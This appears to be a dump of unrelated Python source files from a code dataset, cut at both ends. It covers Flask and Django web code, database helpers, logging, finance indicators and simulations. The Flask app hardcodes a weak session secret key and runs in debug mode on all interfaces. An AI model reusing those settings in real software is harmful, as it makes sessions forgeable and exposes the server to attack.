списке\n :param data: строковый список для обработки\n :return: data_out - искходый список но без пробелов\n '''\n data_out = []\n for row in data:\n row_out = []\n for pos in row:\n if isinstance(pos, str) and pos != '':\n while pos[-1] == ' ':\n pos = pos[:-1]\n if len(pos) == 0:\n break\n row_out.append(pos)\n data_out.append(row_out)\n return data_out\n\n#*********************************************************************\ndef Byte_to_Bytearray(RX_Data):\n '''\n #перевод данных из byte в bytearray\n :param RX_Data:\n :return:\n '''\n #переводим принятые данные в bytearray для удобства дальнейшей работы с ними\n RX_Data_return = bytearray(len(RX_Data))\n for i in range(len(RX_Data)):\n RX_Data_return[i] = RX_Data[i]\n return RX_Data_return\n\ndef toSigned16(n):\n n = n & 0xffff\n return (n ^ 0x8000) - 0x8000\n\ndef toSigned32(n):\n n = n & 0xffffffff\n return (n ^ 0x80000000) - 0x80000000","sub_path":"BIN_ASCII.py","file_name":"BIN_ASCII.py","file_ext":"py","file_size_in_byte":3861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"529513224","text":"\nclass Proventos:\n def __init__(self, dbCon):\n self._cod_cvm = None\n self._tipo_ativo = None\n self._data_aprovacao = None\n self._valor = None\n self._prov_por_unidade = None\n self._tipo = None\n self._dbCon = dbCon\n\n def SelecionarProvento(self, proventos):\n select_proventos = (\"SELECT * FROM PROVENTOS WHERE cod_cvm = %s and tipo_ativo = %s and data_aprovacao = %s\")\n select_data = (proventos._cod_cvm, proventos._tipo_ativo, proventos._data_aprovacao)\n\n result = self._dbCon.ExecuteSqlSelect(select_proventos, select_data)\n\n if (result is not None):\n provento = Proventos(self._dbCon)\n provento._cod_cvm = result[0][0]\n provento._tipo_ativo = result[0][1]\n provento._data_aprovacao = result[0][2]\n provento._valor = result[0][3]\n provento._prov_por_unidade = result[0][4]\n provento._tipo = result[0][5]\n return provento\n else:\n None\n\n def InserirProvento(self, provento):\n proventosAux = self.SelecionarProvento(provento)\n\n provento._valor = str(provento._valor).replace(',','.')\n\n if(proventosAux is None):\n add_provento = (\"INSERT INTO PROVENTOS \"\n \"(cod_cvm, tipo_ativo, data_aprovacao, valor, unidade, tipo)\"\n \"VALUES (%s, %s, %s, %s, %s, %s)\")\n data_dataProvento = (provento._cod_cvm, provento._tipo_ativo, provento._data_aprovacao, provento._valor, provento._prov_por_unidade, provento._tipo)\n\n if(self._dbCon.ExecuteSqlInsertUpd(add_provento, (data_dataProvento)) == True):\n return provento\n else:\n return None\n\n","sub_path":"Entidades/Proventos.py","file_name":"Proventos.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"592128729","text":"import json\n\nfrom elasticsearch_dsl import Q\nfrom pyquery import PyQuery as pq\nfrom django.db import models\n\nfrom solotodo.fields.custom_decimal_field import CustomDecimalField\nfrom solotodo.models.search_form_field import SearchFormField\n\n\nclass SearchFormDecimalSliderField(SearchFormField):\n name_lower = models.CharField(max_length=100)\n name_upper = models.CharField(max_length=100)\n title_label_pattern_lower = models.CharField(\n max_length=255, null=True, blank=True)\n title_label_pattern_upper = models.CharField(\n max_length=255, null=True, blank=True)\n remove_filter_label_pattern_lower = models.CharField(\n max_length=255, null=True, blank=True)\n remove_filter_label_pattern_upper = 
models.CharField(\n max_length=255, null=True, blank=True)\n filtering_pattern_lower = models.CharField(\n max_length=255, null=True, blank=True)\n filtering_pattern_upper = models.CharField(\n max_length=255, null=True, blank=True)\n min_value = models.IntegerField()\n max_value = models.IntegerField()\n step = models.IntegerField()\n\n def __unicode__(self):\n return u'{0} - {1}'.format(self.fieldset, self.label)\n\n def get_base_fields(self):\n return {\n self.name_lower: self.get_widget_lower(),\n self.name_upper: self.get_widget_upper()\n }\n\n def get_widget_lower(self):\n return CustomDecimalField(\n max_value=self.max_value,\n min_value=self.min_value,\n initial=self.min_value,\n required=False,\n title_label_pattern=self.title_label_pattern_lower,\n remove_filter_label_pattern=self.remove_filter_label_pattern_lower\n )\n\n def get_widget_upper(self):\n return CustomDecimalField(\n max_value=self.max_value,\n min_value=self.min_value,\n initial=self.max_value,\n required=False,\n title_label_pattern=self.title_label_pattern_upper,\n remove_filter_label_pattern=self.remove_filter_label_pattern_upper\n )\n\n def _render_lower(self, form, extra_no_ui_slider_ranges):\n # original markup was lost in extraction; a plain container div is assumed here\n widget_container = pq('<div></div>')\n\n widget_node = pq(form[self.name_lower].as_widget(\n attrs={'min': self.min_value,\n 'max': self.max_value,\n # 'step': self.step,\n 'extra_ranges': json.dumps(extra_no_ui_slider_ranges)}))\n widget_node.add_class('form-control')\n\n widget_container.append(widget_node)\n\n return widget_container\n\n def _render_upper(self, form, extra_no_ui_slider_ranges):\n # original markup was lost in extraction; a plain container div is assumed here\n widget_container = pq('<div></div>')\n\n widget_node = pq(form[self.name_upper].as_widget(\n attrs={'min': self.min_value,\n 'max': self.max_value,\n # 'step': self.step,\n 'extra_ranges': json.dumps(extra_no_ui_slider_ranges)}))\n widget_node.add_class('form-control')\n\n widget_container.append(widget_node)\n\n return widget_container\n\n def extra_backend_args(self, form):\n if self.name_lower == 'min_price' and self.name_upper == 'max_price':\n adjusted_max_price = form.cleaned_data['max_price']\n\n if adjusted_max_price == self.max_value:\n adjusted_max_price = None\n\n return {\n 'min_price': form.cleaned_data['min_price'],\n 'max_price': adjusted_max_price\n }\n\n return {}\n\n def render(self, form, extra_no_ui_slider_ranges={}):\n field_node = pq('<div></div>')\n field_node.append(self._render_lower(form, extra_no_ui_slider_ranges))\n field_node.append(self._render_upper(form, extra_no_ui_slider_ranges))\n\n # the original template markup was stripped during extraction; the tag\n # structure below is an approximate reconstruction around the surviving\n # placeholders (step, label, field_node)\n container = pq(\"\"\"\n <div class=\"slider-container\" data-step=\"{}\">\n <div class=\"slider-label\">\n <span>\n {}\n &nbsp;&nbsp;-\n &nbsp;\n </span>\n </div>\n <div class=\"slider-fields\">\n {}\n </div>\n </div>\n 
\"\"\".format(str(self.step), self.label.replace('\\z', ''),\n field_node))\n\n return container\n\n def is_slider(self):\n return True\n\n def active_filters(self, form_cleaned_data, include_redundant_sliders):\n result = {}\n\n initial_values = [self.min_value, self.max_value]\n\n for idx, handle in enumerate(['lower', 'upper']):\n field_name = getattr(self, 'name_' + handle)\n\n value = form_cleaned_data[field_name]\n\n if value == initial_values[idx] and not include_redundant_sliders:\n continue\n\n filtering_pattern = getattr(self, 'filtering_pattern_' + handle)\n\n if value is not None:\n es_field, lookup_type = filtering_pattern.split('__')\n\n kwargs = {\n es_field: {\n lookup_type: value\n }\n }\n\n result[field_name] = Q('range', **kwargs)\n\n return result\n\n class Meta:\n app_label = 'solotodo'\n ordering = ('fieldset', 'ordering', )\n","sub_path":"solotodo/models/search_form_decimal_slider_field.py","file_name":"search_form_decimal_slider_field.py","file_ext":"py","file_size_in_byte":5559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"133356776","text":"# -*- coding:utf-8 -*-\nimport random\n\nfrom flask import Flask, request, render_template, redirect, url_for, session, jsonify\nfrom models.executeSqlite3 import executeSelectOne, executeSelectAll, executeSQL\nfrom functools import wraps\nfrom models.user_manager import UserManager\nfrom models.user_type_manager import UserTypeManager\nfrom models.base_manager import SNBaseManager\nfrom flask_mail import Mail, Message\nimport os\n\n# створюємо головний об'єкт сайту класу Flask\nfrom models.post_manager import PostManager\n\napp = Flask(__name__)\n# добавляємо секретний ключ для сайту щоб шифрувати дані сессії\n# при кожнаму сапуску фласку буде генечитись новий рандомний ключ з 24 символів\n# app.secret_key = os.urandom(24)\napp.secret_key = '121212121212'\n\ndef login_required(f):\n @wraps(f)\n def wrap(*args, **kwargs):\n if 'username' in session:\n if UserManager.load_models.get(session['username'], None):\n return f(*args, **kwargs)\n return redirect(url_for('login'))\n return wrap\n# app.secret_key = '125'\napp.config['MAIL_SERVER'] = 'smtp.gmail.com'\napp.config['MAIL_PORT'] = 587\napp.config['MAIL_USE_TLS'] = True\n# app.config['MAIL_USE_SSL'] = True\napp.config['MAIL_USERNAME'] = 'vovatrap@gmail.com'\napp.config['MAIL_PASSWORD'] = ''\nmail = Mail(app)\n\n@app.route('/email')\ndef email():\n # mail.connect()\n msg = Message('hello',sender='vovatrap@gmail.com', recipients=['vovatrap@gmail.com'])\n # msg.send(mail)\n app.logger.debug('msg = {}'.format(msg))\n app.logger.info('hello')\n app.logger.error('hello')\n app.logger.warning('hello')\n return 'ok'\n\n# описуємо логін роут\n# вказуємо що доступні методи \"GET\" і \"POST\"\n@app.route('/login', methods=[\"GET\", \"POST\"])\ndef login():\n if request.method == 'POST':\n # якщо метод пост дістаємо дані з форми і звіряємо чи є такий користвач в базі данних\n # якшо є то в дану сесію добавляєм ключ username\n # і перекидаємо користувача на домашню сторінку\n user = UserManager()\n if user.loginUser(request.form):\n addToSession(user)\n return redirect(url_for('home'))\n\n return render_template('login.html')\n\n\n\n# описуємо роут для вилогінення\n# сіда зможуть попадати тільки GET запроси\n@app.route('/logout')\n@login_required\ndef logout():\n user = session.get('username', None)\n if user:\n # якщо в сесії є username тоді видаляємо його\n del session['username']\n return 
redirect(url_for('login'))\n\n@app.route('/add_friend', methods=['GET'])\n@login_required\ndef add_friend():\n user_id = int(request.args.get('id',0))\n user = UserManager.load_models[session['username']]\n user.add_friend(id=user_id)\n return redirect(request.referrer)\n\n@app.route('/',methods=['GET'])\n@login_required\ndef user_page(nickname):\n context = {}\n if session.get('username', None):\n user = UserManager.load_models[session['username']]\n context['loginUser'] = user\n\n selectUser = UserManager()\n selectUser.select().And([('nickname','=',nickname)]).run()\n context['user'] = selectUser\n\n return render_template('home.html', context=context)\n\n# описуємо домашній роут\n# сіда зможуть попадати тільки GET запроси\n@app.route('/')\n@login_required\ndef home():\n context = {}\n if session.get('username', None):\n user = UserManager.load_models[session['username']]\n # якщо в сесії є username тоді дістаємо його дані\n # добавляємо їх в словник для передачі в html форму\n context['user'] = user\n context['loginUser'] = user\n return render_template('home.html', context=context)\n\n\ndef addToSession(user):\n session['username'] = user.object.nickname\n\n\n@app.route('/registration', methods=[\"GET\", \"POST\"])\ndef registr():\n context = {'Error': []}\n user_type = UserTypeManager()\n user_type.getTypeUser()\n if session.get('username', None):\n user = UserManager.load_models[session['username']]\n user_type.getTypeGroup()\n context['user'] = user\n context['type'] = user_type\n\n if request.method == 'POST':\n user = UserManager().getModelFromForm(request.form)\n if user.check_user():\n context['Error'].append('wrong name or email')\n if user.object.type.type_name == 'user':\n if not user.object.password:\n context['Error'].append('incorrect password')\n if context['Error']:\n return render_template('registration.html', context=context)\n if user.save():\n UserManager.load_models[user.object.nickname] = user\n addToSession(user)\n return redirect(url_for('home'))\n context['Error'].append('incorrect data')\n return render_template('registration.html', context=context)\n\n@app.route('/add_post', methods=['GET','POST'])\n@login_required\ndef add_post():\n if request.method == 'POST':\n post = PostManager()\n print(list(request.form.keys()))\n user = UserManager.load_models[session['username']]\n post.save_post(request.form, user)\n return render_template('add_post.html')\n\n@app.route('/add_like', methods=['POST'])\n@login_required\ndef add_like():\n app.logger.debug('request.is_xhr = {}'.format(request.is_xhr))\n if request.is_xhr:\n # print(str(request.json['id']))\n user = UserManager.load_models[session['username']]\n app.logger.debug('user = {} like post with id = {}'.format(user.object.first_name, request.json['id']))\n ok =random.choice([True,False])\n print(ok)\n if ok:\n return jsonify({'status':'ok'})\n return jsonify({'status':'error','message':'something wrong'})\n\n\n@app.route('/like_example')\n@login_required\ndef like_example():\n return render_template('index.html')\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0',port=8000,debug=True)\n","sub_path":"goiteens/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"84801891","text":"import numpy as np\n\nclass CoordImage(object):\n \n def __init__(self, data=None, xgrid=None, ygrid=None):\n if xgrid!=None:self.xgrid=xgrid\n if ygrid!=None:self.ygrid=ygrid\n self.points=data\n \n \n \n\n\nif 
__name__ == \"__main__\":\n import doctest\n doctest.testmod()\n \n file=r'test/pointCloud/01_initialization/input/01_OP2S06_CMMsurface.dat'\n data=np.genfromtxt(file)\n xgrid=np.arange(100.)\n ygrid=np.arange(-50.,50)\n a=CoordImage(data, xgrid, ygrid) #image with grid\n b=CoordImage(data) #image without grid","sub_path":"pySurf/CoordImage.py","file_name":"CoordImage.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"108765514","text":"import json\nimport random\n\nimport numpy as np\n\nfrom graph_ter_cls.transforms import utils\nfrom graph_ter_cls.transforms.transformer import Transformer\n\n\nclass GlobalRotate(Transformer):\n def __init__(self,\n num_samples=256,\n mode='isotropic', # isotropic or anisotropic\n transform_range=(-np.pi / 36.0, np.pi / 36.0)):\n super().__init__(out_features=3)\n self.num_samples = num_samples\n self.mode = mode\n self.low, self.high = utils.get_range(transform_range)\n\n @staticmethod\n def _build_rotation_matrix(parameters):\n theta_x = parameters[0]\n theta_y = parameters[1]\n theta_z = parameters[2]\n\n matrix_x = np.eye(3)\n matrix_x[1, 1] = np.cos(theta_x)\n matrix_x[1, 2] = -np.sin(theta_x)\n matrix_x[2, 1] = -matrix_x[1, 2]\n matrix_x[2, 2] = matrix_x[1, 1]\n\n matrix_y = np.eye(3)\n matrix_y[0, 0] = np.cos(theta_y)\n matrix_y[0, 2] = np.sin(theta_y)\n matrix_y[2, 0] = -matrix_y[0, 2]\n matrix_y[2, 2] = matrix_y[0, 0]\n\n matrix_z = np.eye(3)\n matrix_z[0, 0] = np.cos(theta_z)\n matrix_z[0, 1] = -np.sin(theta_z)\n matrix_z[1, 0] = -matrix_z[0, 1]\n matrix_z[1, 1] = matrix_z[0, 0]\n\n matrix = np.matmul(matrix_z, np.matmul(matrix_y, matrix_x))\n return matrix\n\n def __call__(self, x):\n num_points = x.shape[-1]\n if self.mode.startswith('aniso'):\n matrix = np.random.uniform(\n low=self.low, high=self.high, size=(3, self.num_samples)\n )\n else:\n matrix = np.random.uniform(\n low=self.low, high=self.high, size=(3, 1)\n )\n matrix = np.repeat(matrix, self.num_samples, axis=1)\n\n mask = np.sort(random.sample(range(num_points), self.num_samples))\n y = x.copy()\n if self.mode.startswith('aniso'):\n for index, transform_id in enumerate(mask):\n rotation_mat = self._build_rotation_matrix(matrix[:, index])\n y[:, transform_id] = np.dot(rotation_mat, y[:, transform_id])\n else:\n rotation_mat = self._build_rotation_matrix(matrix[:, 0])\n y[:, mask] = np.dot(rotation_mat, y[:, mask])\n mask = np.repeat(np.expand_dims(mask, axis=0), 3, axis=0)\n return y, matrix, mask\n\n def __repr__(self):\n info = self.get_config()\n info_json = json.dumps(info, sort_keys=False, indent=2)\n return info_json\n\n def get_config(self):\n result = {\n 'name': self.__class__.__name__,\n 'sampled points': self.num_samples,\n 'mode': self.mode,\n 'range': (self.low, self.high)\n }\n return result\n\n\ndef main():\n x = np.array([[1, 2, 3, 4, 5, 6, 7],\n [1, 2, 3, 4, 5, 6, 7],\n [1, 2, 3, 4, 5, 6, 7]], dtype=float)\n transform = GlobalRotate(num_samples=2, mode='isotropic')\n y, m, mask = transform(x)\n print(x)\n print(y)\n print(m)\n print(mask)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"graph_ter_cls/transforms/global_rotate.py","file_name":"global_rotate.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"19519989","text":"#!/usr/bin/env python\n\nimport sys\n\nacc = []\nperpl = []\n\n\nwith open(sys.argv[1]) as f:\n ln=0\n for line in f:\n line = line.strip()\n ln 
+= 1\n if line.startswith('Validation perplexity:'):\n if len(acc) != len(perpl):\n raise Exception('Bad file format, unbalanced val. perpl. msg in line %d' % ln)\n\n perpl.append(line.split(':')[1].strip())\n if line.startswith('Validation accuracy:'):\n if len(acc) != len(perpl) - 1:\n raise Exception('Bad file format, unbalanced val. acc. msg in line %d' % ln)\n acc.append(line.split(':')[1].strip())\n\n\nepochs = len(acc)\nprint('\\t'.join([str(i+1) for i in range(epochs)]))\nprint('\\t'.join(acc))\nprint('\\t'.join(perpl))","sub_path":"scripts/print_epoch_acc.py","file_name":"print_epoch_acc.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"456827501","text":"#!/usr/bin/python3\r\n\"\"\" mplog.py: Support library for multi-process logging\r\n\"\"\"\r\n\r\n# Import Required Libraries (Standard, Third Party, Local) ************************************************************\r\nimport multiprocessing\r\nimport logging\r\nimport logging.handlers\r\nimport os\r\nimport sys\r\n\r\n\r\n# Authorship Info *****************************************************************************************************\r\n__author__ = \"Christopher Maue\"\r\n__copyright__ = \"Copyright 2016, The Maue-Home Project\"\r\n__credits__ = [\"Christopher Maue\"]\r\n__license__ = \"GPL\"\r\n__version__ = \"1.0.0\"\r\n__maintainer__ = \"Christopher Maue\"\r\n__email__ = \"csmaue@gmail.com\"\r\n__status__ = \"Development\"\r\n\r\n\r\n# Define Class for Log File / Path Creator ****************************************************************************\r\nclass LogFilePath(object):\r\n \"\"\" Creates log folder and logfile when called. This logfile will be used by the rest of the classes that\r\n make up this application.\r\n \"\"\"\r\n def __init__(self):\r\n self.name = \"undefined\"\r\n self.current_path = str()\r\n self.one_up_path = str()\r\n self.log_file_path = str()\r\n self.log_file_name = str()\r\n\r\n def define(self, **kwargs):\r\n if kwargs is not None:\r\n for key, value in kwargs.items():\r\n if key == \"name\":\r\n self.name = value\r\n # Get current path of script that is executing\r\n self.current_path = os.path.dirname(sys.argv[0])\r\n\r\n if os.path.isdir(os.path.join(self.current_path, 'logs')):\r\n self.log_file_path = os.path.join(self.current_path, 'logs')\r\n else:\r\n self.one_up_path = os.path.split(self.current_path)[0]\r\n if os.path.isdir(os.path.join(self.one_up_path, 'logs')):\r\n self.log_file_path = os.path.join(self.one_up_path, 'logs')\r\n else:\r\n self.log_file_path = self.current_path\r\n\r\n # Check to see if log folder exists in the proper location and create if it doesn't\r\n try:\r\n os.stat(self.log_file_path)\r\n except:\r\n os.mkdir(self.log_file_path)\r\n\r\n # Define log file\r\n self.log_file_name = self.name + '.log'\r\n\r\n return self.log_file_path, self.log_file_name\r\n#\r\n\r\n\r\n# Multiprocess Logger support functions *****************************************************************************\r\ndef listener_configurer(name):\r\n root = logging.getLogger()\r\n path, filename = LogFilePath().define(name=name)\r\n logfile = str(os.path.join(path, filename))\r\n hand = logging.handlers.TimedRotatingFileHandler(logfile, when=\"h\", interval=1, backupCount=10, encoding=None,\r\n delay=False, utc=False, atTime=None)\r\n #form = logging.Formatter('%(asctime)s %(processName)-10s %(name)s %(levelname)-8s %(message)s')\r\n form = logging.Formatter('%(asctime)s 
%(processName)-10s %(levelname)-8s %(message)s')\r\n hand.setFormatter(form)\r\n root.addHandler(hand)\r\n\r\n\r\ndef listener_process(queue, configurer, name):\r\n configurer(name)\r\n while True:\r\n try:\r\n record = queue.get()\r\n if record is None:\r\n break\r\n logger = logging.getLogger(record.name)\r\n logger.handle(record)\r\n except Exception:\r\n import sys, traceback\r\n print(\"Whoops! Problem: \", file=sys.stderr)\r\n traceback.print_exc(file=sys.stderr)\r\n\r\n\r\ndef worker_configurer(queue):\r\n hand = logging.handlers.QueueHandler(queue) # Just the one handler needed\r\n root = logging.getLogger()\r\n root.addHandler(hand)\r\n root.setLevel(logging.DEBUG)\r\n\r\n\r\ndef worker_process(queue, configurer):\r\n configurer(queue)\r\n name = multiprocessing.current_process().name\r\n\r\n\r\ndef main():\r\n queue = multiprocessing.Queue(-1)\r\n listener = multiprocessing.Process(target=listener_process, args=(queue, listener_configurer, \"duh\"))\r\n listener.start()\r\n listener.join()\r\n\r\n\r\n# Run as Script when called as Main ***********************************************************************************\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n\r\n\r\n\r\n","sub_path":"mauehome/mplog.py","file_name":"mplog.py","file_ext":"py","file_size_in_byte":4195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"125669050","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 2 17:58:53 2018\n\n@author: owen\n\"\"\"\n\n# Given a binary tree, find the maximum path sum << from root>>.\n# The path may end at any node in the tree and contain at least one node in it.\n\n# 从root出发的路径,左右只选一条,节点值可能为负\n\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left, self.right = None, None\n\n\n#class Solution:\n# \"\"\"\n# @param root: the root of binary tree.\n# @return: An integer\n# \"\"\"\n# def maxPathSum2(self, root):\n# # write your code here\n# if not root:\n# return 0\n# \n# # Notice! 
node.val may be negative\n# return root.val + max(0, self.maxPathSum2(root.left), self.maxPathSum2(root.right))\n \nclass Solution:\n \"\"\"\n @param root: the root of binary tree.\n @return: An integer\n \"\"\"\n def maxPathSum2(self, root):\n # write your code here\n # DFS\n def dfs(node, curr):\n curr += node.val\n self.res = max(self.res, curr)\n if node.left:\n dfs(node.left, curr)\n if node.right:\n dfs(node.right, curr)\n \n \n if not root:\n return 0\n \n self.res = float('-inf')\n dfs(root, 0)\n return self.res\n \n \nif __name__==\"__main__\":\n root = TreeNode(-1)\n root.left = TreeNode(-2)\n root.right = TreeNode(-4)\n print(Solution().maxPathSum2(root))\n \n root = TreeNode(1)\n root.left = TreeNode(2)\n root.right = TreeNode(4)\n print(Solution().maxPathSum2(root))\n","sub_path":"Binary Tree Maximum Path Sum II.py","file_name":"Binary Tree Maximum Path Sum II.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"547740155","text":"from __future__ import absolute_import\nimport numpy as np\nfrom pyti.function_helper import fill_for_noncomputable_vals\nfrom pyti.relative_strength_index import RSI\nfrom pyti.relative_strength_index import relative_strength_index\nfrom six.moves import range\n\nclass STOCHRSI(RSI):\n def __init__(self, data, period):\n super().__init__(data, period)\n self.stochrsi = stochrsi(data, period)\n\n def get_new_stochrsi(self, data, commit=False):\n range_rsi = None\n new_rsi = super().get_new_rsi(data, commit)\n range_rsi = np.concatenate((self.rsi[-self.period+1:], np.array([new_rsi])), axis=0)\n new_stochrsi = 100 * ((new_rsi - np.min(range_rsi)) / (\n np.max(range_rsi) - np.min(range_rsi)))\n return new_stochrsi\n\ndef stochrsi(data, period):\n \"\"\"\n StochRSI.\n\n Formula:\n SRSI = ((RSIt - RSI LOW) / (RSI HIGH - LOW RSI)) * 100\n \"\"\"\n rsi = relative_strength_index(data, period)\n stochrsi = [100 * ((rsi[idx] - np.min(rsi[idx + 1 - period:idx + 1])) / (\n np.max(rsi[idx + 1 - period:idx + 1]) - np.min(rsi[idx + 1 - period:idx + 1]))) for idx in\n range(period - 1, len(rsi))]\n stochrsi = fill_for_noncomputable_vals(data, stochrsi)\n return stochrsi","sub_path":"pyti/stochrsi.py","file_name":"stochrsi.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"505060232","text":"import random\nimport math\nimport copy\nfrom util import *\nclass Ant:\n def __init__(self, boardWidth, boardHeight, knowledge, genome, x=2, y=2):\n self.uuid = random.randint(0, 999999999999)\n self.x = x\n self.y = y\n self.boardWidth = boardWidth\n self.boardHeight = boardHeight\n self.state = AntState.EXPLORE\n self.knowledge = knowledge\n self.hasFood = False\n self.visitedOnThisTrip = []\n self.goalPoint = []\n self.pathBackToBase = []\n self.maxHealth = genome[\"startingHealth\"]\n self.maxHunger = genome[\"startingHunger\"]\n self.health = self.maxHealth\n self.hunger = self.maxHunger\n self.genome = genome\n self.name = randomName()\n\n def updateKnowledge(self, selectionArgs):\n antBoard = selectionArgs[\"board\"]\n for key in antBoard.keys():\n if antBoard[key] == State.FOOD and not key.split(',') in self.knowledge[\"food\"]:\n self.knowledge[\"food\"].append([int(k) for k in key.split(',')])\n if antBoard[key] == State.COLONY and self.knowledge[\"enemyColony\"] == [] and self.knowledge[\"homeColony\"] != [int(k) for k in key.split(',')]:\n self.knowledge[\"enemyColony\"] = 
[int(k) for k in key.split(',')]\n if ([self.x, self.y] in self.knowledge[\"food\"]):\n # self.knowledge[\"food\"].remove([self.x, self.y])\n self.knowledge[\"food\"] = removeValuesFromList(self.knowledge[\"food\"], [self.x, self.y])\n def reorderMoves(self, oldMoves, newMoveOrder):\n newMoves = []\n for move in newMoveOrder:\n if move in oldMoves:\n newMoves.append(move)\n return newMoves\n def sortMoves(self, moves, location, moveAwayFrom):\n vector = [location[0]-moveAwayFrom[0], location[1]-moveAwayFrom[1]]\n moveOrder = []\n if (abs(vector[0]) > abs(vector[1])):\n # East/West is more important than North/South\n if (vector[0] > 0):\n if (vector[1] > 0):\n moveOrder = ['E', 'N', 'S', 'W']\n else:\n moveOrder = ['E', 'S', 'N', 'W']\n else:\n if (vector[1] > 0):\n moveOrder = ['W', 'N', 'S', 'E']\n else:\n moveOrder = ['W', 'S', 'N', 'E']\n else:\n if (vector[1] > 0):\n if (vector[0] > 0):\n moveOrder = ['N', 'E', 'W', 'S']\n else:\n moveOrder = ['N', 'W', 'E', 'S']\n else:\n if (vector[0] > 0):\n moveOrder = ['S', 'E', 'W', 'N']\n else:\n moveOrder = ['S', 'W', 'E', 'N']\n return self.reorderMoves(moves, moveOrder)\n\n def generateGoalPoint(self):\n self.goalPoint = [random.randint(0, self.boardWidth-1), random.randint(0, self.boardHeight-1)]\n def selectAction(self, selectionArgs):\n antBoard = selectionArgs[\"board\"]\n enemyCol = self.knowledge[\"enemyColony\"]\n homeCol = self.knowledge[\"homeColony\"]\n action = \"\"\n self.transitionStates(antBoard)\n log(\"My state is \" + str(self.state))\n if self.state == AntState.EXPLORE:\n if (self.goalPoint == [] or (self.x == self.goalPoint[0] and self.y == self.goalPoint[1])):\n self.generateGoalPoint()\n log(\"I'm exploring towards \" + str(self.goalPoint) + \". Currently at \" + str([self.x, self.y]))\n action = self.moveTowards(self.goalPoint, antBoard, tunnelsOnly=False)\n # # Should this just be random out of just dirt or all?\n # moves = self.getValidMoves()\n # # random.shuffle(moves)\n # moves = self.sortMoves(moves, [self.x, self.y], homeCol)\n # action = random.choice(self.getValidMoves())\n # for move in moves:\n # pos = getNewPosition([self.x, self.y], move)\n # strPos = str(pos[0]) + \",\" + str(pos[1])\n # if strPos in antBoard: # and antBoard[strPos] == State.DIRT:\n # action = move\n # break\n elif self.state == AntState.FIGHTANT:\n action = 'E' #Should be direction of ant\n elif self.state == AntState.FIGHTCOLONY:\n enemyCol = self.knowledge[\"enemyColony\"]\n if enemyCol == []:\n print(\"I was told to attack the enemy colony, but I don't know where it is\")\n action = random.choice(self.getValidMoves())\n else:\n action = self.moveTowards(enemyCol, antBoard, backtrack=False)\n elif self.state == AntState.GETFOOD:\n action = self.moveTowards(self.getClosestFood(), antBoard, tunnelsOnly=False)\n elif self.state == AntState.RETURNTOBASE:\n if len(self.pathBackToBase) == 0:\n action = random.choice(self.getValidMoves())\n else:\n action = self.pathBackToBase.pop()\n # action = self.moveTowards(homeCol, antBoard, backtrack=False)\n # action = self.moveTowards(homeCol, antBoard, tunnelsOnly=False)\n # Move to function\n if self.state != AntState.RETURNTOBASE:\n if action == 'N':\n actionBack = 'S'\n if action == 'S':\n actionBack = 'N'\n if action == 'W':\n actionBack = 'E'\n if action == 'E':\n actionBack = 'W'\n self.pathBackToBase.append(actionBack)\n # log(\"My path back is \" + str(self.pathBackToBase))\n return action\n\n def transitionStates(self, antBoard):\n if self.state == AntState.EXPLORE:\n if 
(len(self.knowledge[\"food\"]) > 0):\n self.state = AntState.GETFOOD\n elif (self.shouldRetreat()):\n self.visitedOnThisTrip = []\n self.state = AntState.RETURNTOBASE\n elif(self.knowledge[\"enemyColony\"] != []):\n self.state = AntState.FIGHTCOLONY\n elif self.state == AntState.FIGHTANT:\n if (self.shouldRetreat()):\n self.visitedOnThisTrip = []\n self.state = AntState.RETURNTOBASE\n elif self.state == AntState.FIGHTCOLONY:\n if (self.shouldRetreat()):\n self.visitedOnThisTrip = []\n self.state = AntState.RETURNTOBASE\n elif self.state == AntState.GETFOOD:\n if (self.hasFood):\n self.visitedOnThisTrip = []\n self.state = AntState.RETURNTOBASE\n elif (len(self.knowledge[\"food\"]) == 0):\n self.state = AntState.EXPLORE\n elif self.state == AntState.RETURNTOBASE:\n if (len(self.pathBackToBase) == 0 or (self.x == self.knowledge['homeColony'][0] and self.y == self.knowledge['homeColony'][1])):\n self.state = AntState.EXPLORE if len(self.knowledge['food']) == 0 else AntState.GETFOOD\n\n def shouldRetreat(self):\n # Later on, this should involve random mutations. For now, just go back when you should\n # distToCol = (self.x - self.knowledge[\"homeColony\"][0]) + (self.y - self.knowledge[\"homeColony\"][1])\n return self.health < self.maxHealth\n\n def getClosestFood(self):\n closestFood = []\n closestDist = 999999999999\n for food in self.knowledge[\"food\"]:\n dist = abs(food[0]-self.x) + abs(food[1]-self.y)\n if dist < closestDist:\n closestDist = dist\n closestFood = copy.copy(food)\n return closestFood\n\n\n def moveTowards(self, newLocation, antBoard, tunnelsOnly=True, backtrack = True):\n validMoves = self.getValidMoves()\n if 'W' in validMoves and not (newLocation[0] < self.x):\n validMoves.remove('W')\n if 'E' in validMoves and not (newLocation[0] > self.x):\n validMoves.remove('E')\n if 'S' in validMoves and not (newLocation[1] < self.y):\n validMoves.remove('S')\n if 'N' in validMoves and not (newLocation[1] > self.y):\n validMoves.remove('N')\n if len(validMoves) > 0:\n 